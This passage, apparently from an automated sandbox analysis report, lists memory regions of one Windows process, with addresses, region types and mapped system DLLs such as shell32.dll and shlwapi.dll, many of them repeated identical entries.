0x2160000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 811 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 812 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 813 start_va = 0x2a90000 end_va = 0x2e82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a90000" filename = "" Region: id = 814 start_va = 0x75270000 end_va = 0x75288fff entry_point = 0x75270000 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\SysWOW64\\olepro32.dll" (normalized: "c:\\windows\\syswow64\\olepro32.dll") Region: id = 815 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 816 start_va = 0x76100000 end_va = 0x76d49fff entry_point = 0x76100000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 817 start_va = 0x76f10000 end_va = 0x76f66fff entry_point = 0x76f10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 818 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 819 start_va = 0x650000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 820 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 821 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 822 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 823 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 824 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 825 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 826 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 827 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 828 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 829 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 830 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 831 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 832 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 833 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 834 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 835 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 836 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 837 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 838 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 839 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 840 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 841 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 842 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 843 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 844 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 845 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 846 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 847 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 848 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 849 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 850 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 851 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 852 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 853 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 854 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 855 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 856 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 857 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 858 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 859 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 860 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 861 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 862 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 863 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 864 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 865 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 866 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 867 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 868 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 869 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 870 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 871 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 872 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 873 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 874 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 875 start_va = 0x670000 end_va = 0x6acfff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 876 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 877 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 878 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 879 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 880 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 881 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 882 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 883 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 884 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 885 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 886 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 887 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 888 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 889 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 890 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 891 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 892 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 893 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 894 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 895 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 896 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 897 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 898 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 899 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 900 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 901 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 902 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 903 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 904 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 905 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 906 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 907 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 908 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 909 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 910 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 911 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 912 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 913 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 914 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 915 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 916 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 917 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 918 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 919 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 920 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 921 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 922 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 923 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 924 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 925 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 926 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 927 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 928 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 929 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 930 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 931 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 932 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 933 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 934 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 935 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 936 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 937 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 938 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 939 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 940 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 941 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 942 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 943 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 944 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 945 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 946 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 947 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 948 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 949 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 950 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 951 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 952 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 953 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 954 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 955 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 956 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 957 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 958 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 959 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 960 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 961 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 962 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 963 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 964 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 965 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 966 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 967 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 968 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 969 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 970 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 971 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 972 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 973 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 974 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 975 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 976 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 977 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 978 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 979 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 980 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 981 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 982 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 983 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 984 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 985 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 986 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 987 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 988 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 989 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 990 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 991 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 992 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 993 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 994 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 995 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 996 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 997 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 998 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 999 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1000 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1001 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1002 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1003 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1004 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1005 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1006 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1007 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1008 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1009 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1010 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1011 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1012 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1013 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1014 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1015 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1016 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1017 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1018 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1019 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1020 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1021 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1022 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1023 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1024 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1025 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1026 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1027 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = 